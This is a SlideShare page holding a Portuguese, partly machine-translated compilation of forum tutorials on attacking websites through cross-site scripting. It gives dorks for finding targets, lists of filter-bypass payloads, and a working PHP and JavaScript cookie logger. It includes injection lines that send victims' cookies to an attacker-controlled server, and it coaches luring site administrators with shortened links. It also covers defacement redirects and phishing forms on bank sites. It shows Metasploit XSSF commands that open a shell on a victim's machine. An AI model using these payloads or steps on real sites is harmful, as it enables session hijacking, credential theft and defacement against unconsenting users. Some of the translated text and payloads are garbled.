SlideShare a Scribd company logo
1 of 29
Download to read offline
XSS INJECTION
BASICO XSS

O que é Cross Site Scripting (XSS)?
Cross Site Scripting permite que você insira um código malicioso em uma aplicação
web. (quase com um código javascript, mas também é possível inserir outros códigos
como PHP ou HTML.
É uma vulnerabilidade que está em quase todos os site que você pode encontrar na
WWW.
Além disso, vou falar sobre 2 maneiras diferentes de usar XSS …

1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página.

2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o
atacante irá escolher um site com alguns campos “input”, como shoutboxes, blogs e
guestbooks.

Encontrando vulnerabilidades XSS

1. Http://www.google.com Visite
2. Use “dorks Google”, como search.php? Q =
3. Encontrado o “direito” site para injetá-lo.
Noções básicas de XSS

Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:

Citação:
<script>alert(“something”)</script>
Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer “alguma
coisa”.

Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS.
Basta olhar:

Citação:
http://database.delete.com/search.php?q=<script>alert(“something”)</script>
Isso foi um exemplo para um XSS com javascript.

Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar
para executar um XSS.

Aqui está um exemplo de uma injeção HTML:

Citação:
<br><br><b><u>something</u></b>
Será algo como:
Citação:
http://database.delete.com/search.php?q=<br><br><b><u>something</u></b>
Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS.

Defacment com XSS

Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes
códigos:

Citação:
<IMG SRC=”http://mywebsite.com/defacmentpic.jpg”>
= Irá incluir uma imagem

Citação:
<EMBED SRC=”http://mywebsite.com/deface.swf”
= Incluirá um vídeo em Flash

Citação:
<embed src=”deface.mid” hidden autostart=”true” loop=”false” />
= Vai incluir um arquivo de música em modo oculto

Citação:
<script>window.open( “http://www.XXXXXXX.net/” )</script>
= Redireccionado para outro site, neste caso “XXXXXXXXXXXX.net”

Roubar cookies usando XSS
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)

Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um
log.txt onde seus logs serão armazenados.
Certifique-se que ele funciona!

Procura um site vuln e insira o seguinte código:
(substitui-lo com suas informações)

Citação:
document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie
Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu
CookieLogger.
Analisar o madeireiro para seus cookies e sequestrar a sua sessão.

Mas o que é se o site não possui uma função tal loja?
Veja …

Citação:
http://website.com/search.php?q=document.location =
“http://myserver.com/cookielogger.php?c=”+document.cookie
Você será redirecionado ao site original para o servidor.
(você deve cripta “a seqüência de URL, porque a sua vítima poderia observar o código
malicioso incluído para o original URL)

Mas como “crypt” esse código para se tornar “normal”, de modo que sua vítima não
percebe o redirecionamento para o servidor?

Fácil … tudo que você precisa é de uma String para ASCII Converter e as
características da função ()
(Http://www.easycalculation.com/ascii-hex.php)

Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII.

Citação:
<script>alert(“Example”)</script>
é igual

Citação:
60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101
34 41 60 47 115 99 114 105 112 116 62
Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como
esta:

Citação:
60,115,99,114,105, [...]
Finished! Você crypted seu código malicioso a um “código” malicioso escondido: D!

Ignorando Filtros

Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens?

Hm, temos de encontrar outro método … basta escrever o código de uma maneira
diferente.

Citação:
<script>alert(“Example”)</script>
seria

Citação:
‘)alert(“Example”);

ROUBO DE COOKIES
Olá amigos do INW, confiram este tutorial enviado por aratorny sobre XSS.

Primeiro de tudo, eu traduzi ele no google e mudei algumas coisas, mais acho que deu
pra entender, até porquê, eu aprendi a fazer XSS assim.. Espero que gostem!.

Aqui está um outro tutorial escrito por XSS mim. Começarão aprendizagem de hackers
comigo.
Vou tentar fazer isso o mais breve possível, abrangendo apenas o básico para que ele
ajuda a noobs a entender ;p

Então vou começar como sempre
O que é XSS?
Aqui está o wikipedia diz:
Cross-site scripting (XSS) é um tipo de computador vulnerabilidade de segurança
normalmente encontrados em aplicações web que permite que atacantes para injetar
client-side script em páginas da Web vistos por outros usuários. Um cross-site scripting
vulnerabilidade pode ser usada por crackers para contornar os controles de acesso,
como a política de mesma origem. Cross-site scripting realizadas em sites responderam
por aproximadamente 80,5% de todas as vulnerabilidades de segurança documentadas
pela Symantec a partir de 2007. [1] O seu efeito pode variar de um incômodo pequeno
para um risco de segurança significativo, dependendo da sensibilidade dos dados
manipulados pelo o site vulnerável ea natureza de qualquer atenuação de segurança
implementada pelo proprietário do site.

Ataque!

Assim, nesta seção iremos aprender como usar XSS para ganhar controle sobre alguns
website.So isto é para um noob real, que não sei nada sobre isso Sorrindo

Assim como em todos os hackers outro, XSS também começa por encontrar uma
vulnerability.But você pode precisar fazer várias coisas para saber se um site é
realmente vulnerável.

Então, em primeiro lugar, lembre-se this.A site que tem algo como uma caixa de
pesquisa, espaço de login ou qualquer coisa semelhante é mais vulnerável XSS.

Portanto, para este primeiro ataque, nós estaremos usando uma caixa de pesquisa.
Então coloque este pequeno pedaço de código na caixa e pressione Enter Sorridente

Citação:

1
<script>alert("XSS")</script>
Agora você pode ver seu script de uma forma muito simples, portanto, incluída no script
script tags.The é alertar uma mensagem simples, XSS.Now se uma pequena caixa pop
uped dizendo XSS, parabéns! Seu site é vulnerável! Agora, se nada aparecer, isso
significa que o site tem filtrado filtro it.This pode ser facilmente contornado por us.There
muitos tipos de filtros e na maioria das vezes, o seu bloqueio da caixa de alerta.

Assim, em seu código, você encerrou a mensagem “XSS” em dupla quotes.So o
sistema sabe que você está tentando XSS hackers desde que foi fechado em quotes.So
dupla temos para criptografar a nossa mensagem para enganar o sistema inteligente?

Então, agora usamos uma função pouco chamado “String.fromCharCode” Então, o que
isso faz é criptografar o nosso texto para linguagem ASCII .. Aqui está um exemplo de
como parece.:

Citação:
String.fromCharCode(88,83,83)
Agora 88,83,83 são valores ASCII para XS S.Check este link para saber a tabela de
conversão.

http://www.ascii.cl/

Não é necessário que Toungee
Então, agora digite o código recém-formatado na caixa de busca e aperte enter.

Citação:

1
<script>alert(String.fromCharCode(88,83,83))</script>
A coisa especial é que você não precisa usar aspas, neste caso, uma vez que esta
função é usada Agora você deve obter a caixa pop-up na maioria dos casos.
Else há muitos pedaços de código outros que você pode inserir yourself.You pode fazer
códigos e introduza-o se você sabe alguma codificação de sorriso
Aqui são pedaços de código mais alguns que eu encontrei na net que você pode usar
para fazer isso:

Citação:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83)) </script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83) )</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
Essas consultas só deve ser capaz para você cortar qualquer tipo de websites.Even dos
maiores sites pode estar tendo algumas vulnerabilidades XSS que você pode encontrar
com estes idiotas.

Avançado XSS

Agora vamos aprender a usar essas coisas para atacar websites.Keep em mente que
isso é completamente ilegal e você pode ser pego e pode ser cobrado por crime para
fazer this.So tomar precauções sempre.

Roubar Cookies

Então, agora vamos usar o método Cookies roubar para fazer o attack.It é um tipo
especial de biscoito / logger que registra o usuário que acessa esse page.So existem
muitas maneiras de fazer isso, mas aqui é um método fácil.
Portanto, neste método, você precisará configurar um website.So ir para algum sites.I
hospedagem preferem http://www.000webhost.com e criar uma conta no que
website.Go para gerenciador de arquivos e criar um novo arquivo de texto em it.Name
ele qualquer coisa como cookielog.txt ou algo parecido t that.Don ‘enter nada para ele
it.Leave blank.Create outro arquivo txt e nomeie-o algo cookiellogger.txt.So exemplo
different.For iremos adicionar algum código em -lo para que ele possa enviar logs para
o file.So cookielog.txt abrir o arquivo de texto 2 e digite este código:
Citação:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?php

if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."n");
fclose($fp);
} else {
?>

var ownUrl = ' echo $_SERVER['HTTP_HOST']; ?><?php echo
$_SERVER['PHP_SELF']; ?>';

function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";

var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.n" +
"(URL encoding only supports 8-bit characters.)n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for

return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>
Então esse é o script.Agora no cookielogger precisamos mandar essa mensagem para
o administrador do site website.So alvo mais provavelmente o administrador não vai
olhar it.Since temos que convencê-lo, vamos encurtar o url.Go para www.spam.com/ e
encurtar a sua URL.And já que queremos adicionar vulnerabilidade, precisamos
adicionar algum código também. Então, adicione este código após a URL e reduzi-lo.

Citação:

1
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" +
document.cookie;</script>
Envie o link para o administrador e esperar para que ele clique it.You precisa ter sorte
para o administrador clicar nele Uma vez que ele clicou, você terá a cookie.Now você
pode usar algumas ferramentas como o addon gerenciador de cookies que você
começa para Mozilla e jogar em torno dele. Sua addon muito bom e realmente ajuda a
fazer um monte!

Deface

Então agora podemos desfigurar a website.Isso é, a publicação que você ganhou
controle sobre o site fazendo uma página de desfigurar ou something.Now você precisa
usar um pequeno script para redirecionar todo mundo que visita o site para a página de
desfigurar.

Citação:

1
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
Substitua a sintaxe com a sua página desfigurar site.

Ignorando o filtro XSS

Assim, na maioria das vezes, o simples script não vai dar o pop-up message.It costuma
ignorar o filter.So você tem que usar algum outro methods.I irá discutir alguns deles
abaixo.

Hex Bypass ( Ignorar )

Com personagens bloqueados como>, <, e /, é muito difícil de executar uma consulta de
XSS. Não se preocupe, há sempre uma solução Sorrindo Você pode mudar seus
personagens, em hexadecimal. A Hex de um determinado personagem, é basicamente
o personagem, mas em um formato diferente. Estes devem ajudá-lo:

> =% 3c
<=% 3c
/ =% 2f

Ignorando ASCII

Com uma criptografia ASCII, podemos usar o caractere "Qual é bloqueado um pouco
Este é um dos o filtro XSS mais comum ignora de todos os tempos Um script que você
precisa para criptografar, ficaria assim...:

Citação:

1
<script>alert("XSS")</script>
E esta deve estar funcionando:

Citação:

1
<script> alert ("XSS") </ script>
Para criptografar a sua pequena parte de um script, vá a este site:
http://www.wocares.com/noquote.php

Ignorando Case-Sensitive

Este tipo de cirurgia raramente funciona, mas vale sempre a pena um tiro. Alguns filtros
são definidos no local para detectar determinadas seqüências, no entanto, as cordas do
filtro que são bloqueados são caso sensível. Então, tudo o que precisamos fazer é
executar um script, com diferentes tamanhos de caracteres. Este desvio, ficaria assim:

Citação:
1
<script> alert ("XSS") </ script>
Você também pode misturar isso com criptografia ASCII se você gosta. Este tipo de
cirurgia só funciona em filtros realmente estúpido, ou aqueles realmente muito velho.
E por último, eu estou dando alguns idiotas XSS que você pode experimentar no
Google.

Citação:

1
2
3
4
5
6
inurl: search.php?
inurl: find.php?
inurl: search.html
inurl: find.html
inurl: Search.aspx
inurl: find.aspx
Obrigado por ler...
Tradução & Edit: Aratorny
Conteúdo: Rain112
Postado por: aratorny
ACESSO AO PROMPT DO ALVO POR XSS
Explorando XSS

XSS (ou CSS, sem confundir com a linguagem para webdesign) é uma vulnerabilidade
que permite ao atacante ter acesso à modificação de uma determinada área da página.
Sua detecção geralmente é feita incluindo, na variável supostamente vulnerável, um
código JavaScript (client-side, ou seja, trabalha no lado do cliente) que apenas mostra
uma caixa de alerta com o texto “XSS”. Veja:
Código:

1
<script> alert("xss"); </script>
Esta falha pode ocorrer, por exemplo, em formulários de busca (onde é mais comum) e
em diferentes casos, como em um simples redirecionamento (como na maioria dos
grandes mecanismos de pesquisa, como o Google).
Desta falha, há 2 tipos:
Reflected (refletido): Executa-se apenas para o cliente vítima do ataque, que deve
incluir engenharia social.
Stored (estocado/permanente): Fica gravado em um banco de dados e executa-se a
quem abrir a página. Comum em fóruns, páginas de recados e livros de visitas.

Por que você exploraria uma falha como essa?

Por que você participa de um fórum ou rede social onde todos tem sua conta, cada qual
com seus privilégios, e você quer escalá-los. Neste caso, pode ser feito um código que
obtém os cookies do navegador e os envia para algum script seu, via GET, que os
obtém e os grava. Veja um exemplo:
Crie, no T35 (ou no servidor de sua preferência), um script em PHP desta maneira:
Código PHP:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$cookies = $_SERVER['QUERY_STRING']; // obtém-se tudo o que há depois de "?" na
URL

$grava = fopen("hackeds.txt", "a+"); // abre-se um arquivo para escrita

fwrite($grava, $cookies . "n n n"); // grava-se os cookies neste arquivo e pula 3 linhas
para organização

fclose($grava); // fecha o arquivo
echo "<script> window.close(); </script>"; // fecha a janela

exit; // pronto
?>
Claro que não se faz apenas com PHP. Se você trabalha em outra linguagem, boa sorte
e vá aos estudos. Porém, PHP é uma linguagem mais comumente usada e fácil de se
aprender.
Agora, como você conseguirá obter esses cookies?
Simples:
Código:

1
<script> window.open("http://seusite/seuscript.php?"+document.cookie); </script>
Mas, e se o alvo não permite que você inclua códigos JavaScript? Tente resolver com
isso e com alguns outros métodos (pesquise…).
Quer outra razão para explorar essa falha? Falsificar um site e conseguir alguma
informação, como um login e uma senha, de um usuário. Por exemplo, se o formuário
de busca de um banco possui uma falha, e você quer conseguir informações
privilegiadas, mas não quer simplesmente criar um fake no T35, para não mudar o
domínio, uma sugestão é (para não falar “você pode”) criar um formulário ali mesmo,
com um action para uma página em um servidor de sua preferência. E, claro, encriptar
um pouco a URL ou usar encurtador de links (se mudar o domínio não for atrapalhar)
será interessante. Outra razão é um deface. Dependendo da localização onde está a
falha, você pode escrever (com document.write()) um iFrame ou usar um location.href
para redirecionar a página. Mas, se a localização da falha é dentro de um frame, há
formas de burlar isso. Veja:
Código:

1
<script> if (window!= top) { top.location.href=location.href; } </script>
Quer ainda outra razão? Invadir o computador de alguém! Para isso, usaremos o nosso
amigo Metasploit e seu parceiro framework chamado XSSF. Baixamos este último e o
extraímos no diretório de instalação do Metasploit? Agora vamos abrir a console do
Metasploit (sempre digo que consoles te dão mais poder de fogo do que interfaces
gráficas, entre tantas razões, o gasto de memória, por exemplo). Vamos então fazer o
Metasploit reconhecer o framework, usando o comando “load”.
Código:

1
load XSSF
Este comando abrirá um servidor em seu computador com um código JavaScript para
ser executado no cliente. Neste caso, ele nos retornou, nas últimas linhas:
Código:

1
2
Please, inject 'http://SEU.IP.AQ.UI:88888/loop' resource in an XSS
Successfully loaded plugin: XSSF
Então, usaremos a URL “http://SEU.IP.AQ.UI:88888/loop”. Após injetá-lo da maneira
que quiser (ou que puder), veremos quem caiu, ou melhor, se conectou, usando o
seguinte comando em nosso console:
Código:

1
xssf_active_victims
E ele nos retornou os endereços IP’s de quem se conectou, se ainda está conectado, o
seu navegador e a versão e o suporte a cookies. E ele nos alerta também que podemos
usar o comando xssf_information [VictimID] para ver mais informações sobre uma
vítima. Pegamos o ID da vítima dado na tabela do comando anterior e usamos o
comando. Ali vemos ainda seu sistema operacional, a arquitetura de sua máquina, a
URL em que está agora e as informações vistas anteriormente, além de outras.
Ainda podemos executar códigos JavaScript em tempo real. Faremos uma caixa de
alerta, por exemplo, usando o módulo Auxiliary XSSF Alert. Além disso, ainda podemos
ler seus cookies, acessar sua área de transferência, e muito mais. Vamos, por exemplo,
invadir o prompt de comando da vítima. Vamos usar o exploit
ms10_046_shortcut_icon_dllloader para isso. Veja o processo da digitação:
Código:

1
2
3
4
5
6
use windows/browser/ms10_046_shortcut_icon_dllloader
jobs
xssf_active_victims
xssf_exploit 7 0
sessions -i l
shell
Com esses simples comandos, dizemos ao Metasploit para fazer uma espécie de
ligação com o exploit, vemos os trabalhos ativos, as vítimas do nosso XSS e, alguns
comandos a mais, abrimos o shell, e veja o resultado final:
Código:

1
2
3
4
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and Settings[alvo]>_
Como vimos, acessamos o prompt de comando do alvo. Lembrando que para isso o
alvo precisa estar com Internet Explorer (ou, da minha maneira, IEca).

Para fazer um teste (o alvo estava ciente, já que era minha máquina virtual), usava
Debian Linux (de onde partiram as versões Ubuntu – Debian 3, e Educacional – Debian
2 com GUI KDE). A máquina tem 1 GB de RAM (dos quais 350 são para o Windows XP
virtualizado).

Até a próxima!

TUTORIAL USANDO XSS EM FLASH
O seu alvo não possui uma vulnerabilidade clara de XSS Stored, onde você possa
incluir JavaScript. Aparentemente, não possui falha nenhuma em web, mas naquele
livrinho de visitas ou recados (e fórum) eles te deixaram incluir Flash.
Tudo bem. Como eu vou aproveitar isso? Não vou poder ter acesso ao servidor com
isso, visto que Flash é um client-side. Ôpa!, client-side? JavaScript também é!
Legal! Vou mostrar aqui o que eu aprendi depois de um tempo de conversa com o pink
noise, agora super administrador do FH, logo após ter ownado o fórum adversário. Ele
me contou um pouco sobre a falha explorada para esta ação. Antes da conversa, o que
eu entendia de Flash se resumia em “absolutamente nada”. Eu tinha o Macromedia
Flash PRO 8 instalado na máquina e parado. Claro que ainda não entendo quase nada
de Flash, mas isso já é o suficiente para aprender a explorar essa falha.
Primeiro, certifique-se de ter o Flash e Action Script 2 (ou superior) em sua máquina.
Você pode baixá-lo aqui (não dou muita garantia deste link. Baixe por sua própria conta
e risco). Agora, vamos fazer nosso primeiro teste com o comando geturl.
Código:
getURL('javascript:alert("oi")');
Aqui fizemos somente o básico: mostramos uma caixa de mensagem escrito “oi”. Mas já
iniciamos no JS em SWF.
Mas, segundo o próprio pink noise, usar geturl() pode nos limitar. Não sei o porquê, mas
quem sou eu pra duvidar, já que tudo o que sei sobre Flash se resume nestas linhas?
Neste caso ele me sugeriu fazer o seguinte:

Código:
import flash.external.ExternalInterface;
ExternalInterface.call("function(){ alert('oi'); }", "");
Note que você deverá trocar o alert(‘oi’); pelo código JS que quiser. Veja alguns
exemplos:

Código:
import flash.external.ExternalInterface;
ExternalInterface.call("function(){ location.href = 'http://seusite/pegadados.php?
dado='+document.cookie; }", "");
Código:
import flash.external.ExternalInterface;
ExternalInterface.call("function(){ document.write('&lt;iframe src=http://seusite/own.html
width=100% height=100%&gt;&lt;/iframe&gt;'); }", "");
Isto também é interessante: Note que nos exemplos acima, o nosso arquivo fará o préprogramado. Mas, seria legal usar um arquivo universal com o comando que você
quiser na hora, não é? Assim, usando um encurtador de links, fica melhor e mais rápido.
Para isso, faça o seguinte:

Código:
getURL('javascript:eval(document.location.hash.substr(1))');
Assim, você acessaria:
Citação:
http://seusite/arquivo.swf#alert(“oi”);
Lembrando que salvando como arquivo do Flash ele não irá abrir corretamente. Para
isso você deve exportá-lo para SWF (File > Export > Export movie, podendo variar).

Como explorar isso? Veja pelos exemplos. Dependendo da localização onde estará seu
arquivo, não é interessante ownar de primeira metendo um iframe. Seria mais
inteligente adquirir os cookies dos usuários e, possivelmente, de um usuário
privilegiado. Pode também ser usado como um simples XSS Reflected, para enganar o
alvo pelo domínio.

Outra: dependendo da versão de seu Action Script, é necessário colocar, antes do
código:

Código:
class Main
{
static function main(){
E depois:

Código:
}
}
Isto é tudo, pessoal! Moral da história: não permita o uso de <embed> no filtro HTML.
Se você precisar inserir vídeos, empregue um dos módulos que inserir vídeos de fontes
confiáveis e impedir a interação script.
AUTOR: 0KaL
XSS EM MURAL DE SITES

Esse medoto é velho mais funfa ,
se tiver outro topico igual aqui podem excluir este =)

mural é a pagina onde fica os recados dos visitantes do site.

www.site.com.br/mural.php
” /muralderecados.php

pode ser diversos jeitos,
ai vai tar la pra voce postar seu recados ou comentario, ai você vai colocar uma alerta

prencha os campos

nome
email

claro que vai ser com dados falsos xD
ai na mensagem você coloca <script type="text/javascript">// alert("textoaki")
// ]]>>
se aparecer uma alerta com os seu texto é porque ta vul
ai voce vai fazer para redirecionar para a sua index que esta modificada
ai voce vai la pra postar o recado

e coloca

<script type="text/javascript">//
window.location.href="http://myips.110mb.com/dilluvium.html";
// ]]>>

ali ta a minha index você coloca a sua e a pagina vai passar a redirecionar para seu site
=)

para achar sites coloquei no google

inurl:”mural.php”
inurl:”recados.php”
inurl:”muralderecados.php”

Nao se esqueça do proxy

Espero que tenham entendido , nao sou muito bom com explicações..huauhau

Flwss

More Related Content

What's hot

Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4William Costa
 
Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoCleórbete Santos
 
Desenvolvimento web seguro cookies - Rodolfo Stangherlin
Desenvolvimento web seguro cookies - Rodolfo StangherlinDesenvolvimento web seguro cookies - Rodolfo Stangherlin
Desenvolvimento web seguro cookies - Rodolfo StangherlinTchelinux
 
O submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesasO submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesasCleórbete Santos
 
Hacking em consoles webs de security appliances, h2hc-rev-2
Hacking em consoles webs de security appliances, h2hc-rev-2Hacking em consoles webs de security appliances, h2hc-rev-2
Hacking em consoles webs de security appliances, h2hc-rev-2William Costa
 
PHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael Jaques
PHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael JaquesPHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael Jaques
PHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael JaquesRafael Jaques
 
Palestra criando aplicações seguras com php (2)
Palestra  criando aplicações seguras com php (2)Palestra  criando aplicações seguras com php (2)
Palestra criando aplicações seguras com php (2)Leandro Lugaresi
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da InformaçãoVinicius Marangoni
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilWilliam Costa
 
Browser Hijacker
Browser HijackerBrowser Hijacker
Browser HijackerADIDAS MAN
 
[JS EXPERIENCE 2018] Segurança para Desenvolvedores JavaScript - Alan Cezar ...
[JS EXPERIENCE 2018]  Segurança para Desenvolvedores JavaScript - Alan Cezar ...[JS EXPERIENCE 2018]  Segurança para Desenvolvedores JavaScript - Alan Cezar ...
[JS EXPERIENCE 2018] Segurança para Desenvolvedores JavaScript - Alan Cezar ...iMasters
 

What's hot (16)

Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4
 
Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetração
 
Desenvolvimento web seguro cookies - Rodolfo Stangherlin
Desenvolvimento web seguro cookies - Rodolfo StangherlinDesenvolvimento web seguro cookies - Rodolfo Stangherlin
Desenvolvimento web seguro cookies - Rodolfo Stangherlin
 
O submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesasO submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesas
 
Hacking em consoles webs de security appliances, h2hc-rev-2
Hacking em consoles webs de security appliances, h2hc-rev-2Hacking em consoles webs de security appliances, h2hc-rev-2
Hacking em consoles webs de security appliances, h2hc-rev-2
 
PHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael Jaques
PHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael JaquesPHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael Jaques
PHP Sob Ataque - Técnicas de Programação Defensiva - FISL 12 - Rafael Jaques
 
Java hidden features
Java hidden featuresJava hidden features
Java hidden features
 
Palestra criando aplicações seguras com php (2)
Palestra  criando aplicações seguras com php (2)Palestra  criando aplicações seguras com php (2)
Palestra criando aplicações seguras com php (2)
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da Informação
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasil
 
Browser Hijacker
Browser HijackerBrowser Hijacker
Browser Hijacker
 
Vim
VimVim
Vim
 
[JS EXPERIENCE 2018] Segurança para Desenvolvedores JavaScript - Alan Cezar ...
[JS EXPERIENCE 2018]  Segurança para Desenvolvedores JavaScript - Alan Cezar ...[JS EXPERIENCE 2018]  Segurança para Desenvolvedores JavaScript - Alan Cezar ...
[JS EXPERIENCE 2018] Segurança para Desenvolvedores JavaScript - Alan Cezar ...
 
Segurança Web com PHP5
Segurança Web com PHP5Segurança Web com PHP5
Segurança Web com PHP5
 
Java hidden features
Java hidden featuresJava hidden features
Java hidden features
 

Similar to Xss

Construindo uma aplicação PHP à Prova de Balas - Rafael Jaques
Construindo uma aplicação PHP à Prova de Balas - Rafael JaquesConstruindo uma aplicação PHP à Prova de Balas - Rafael Jaques
Construindo uma aplicação PHP à Prova de Balas - Rafael JaquesTchelinux
 
JavaScript - #Aula01 - Introdução
JavaScript - #Aula01 - IntroduçãoJavaScript - #Aula01 - Introdução
JavaScript - #Aula01 - IntroduçãoErick L. F.
 
Website security
Website securityWebsite security
Website securitythiagosenac
 
Seminário PHP Injection/ SQL Injection
Seminário PHP Injection/ SQL InjectionSeminário PHP Injection/ SQL Injection
Seminário PHP Injection/ SQL InjectionDavi Rodrigues
 
Aprendendo a criar plugins para o Wordpress - Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard BarrosAprendendo a criar plugins para o Wordpress - Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard BarrosRichard Barros
 
Como Fazer Apps Node.Js Seguras
Como Fazer Apps Node.Js SegurasComo Fazer Apps Node.Js Seguras
Como Fazer Apps Node.Js SegurasPaulo Pires
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEMagno Logan
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploitRoberto Soares
 
Badass XSS: Esqueça o alert e vá para mundo real
Badass XSS: Esqueça o alert e vá para mundo realBadass XSS: Esqueça o alert e vá para mundo real
Badass XSS: Esqueça o alert e vá para mundo realDaniel Marques
 
Teste de Segurança: Vulnerabilidade de Aplicações Web
Teste de Segurança: Vulnerabilidade de Aplicações WebTeste de Segurança: Vulnerabilidade de Aplicações Web
Teste de Segurança: Vulnerabilidade de Aplicações WebMarcio Roberto de Souza Godoi
 
SEO para Front-End - BeagaJS
SEO para Front-End - BeagaJSSEO para Front-End - BeagaJS
SEO para Front-End - BeagaJSFabio Ricotta
 
Segurança & Ruby on Rails
